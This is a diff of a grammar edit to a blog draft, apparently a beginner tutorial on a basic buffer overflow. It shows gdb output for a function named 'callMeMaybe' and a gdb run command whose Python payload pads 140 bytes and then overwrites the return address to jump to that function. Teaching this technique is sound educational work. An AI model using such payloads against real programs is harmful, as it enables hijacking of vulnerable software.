myexperiments-blog/myexperiments-blog.github.io/_drafts/2018-10-10-basic-buffer-overflow.md

 $1 = {void ()} 0x80484c6 <callMeMaybe>
 ```

-We have now everything we need to execute this command through the buffer overflow vulnerability.
+We now have everything we need to execute this command through the buffer overflow vulnerability.
-For call `callMeMaybe`, it is necessary to run the program with an offset of 140 followed by the address of the function in little endian (`0x80484c6` =>  `0xc6840408`).
+For call the function `callMeMaybe`, it is necessary to run the program with an offset of 140 followed by the address of the function in little endian (`0x80484c6` =>  `0xc6840408`).

 ```sh
 gdb-peda$ run $(python -c 'print "A" * 140 + "\xc6\x84\x04\x08"')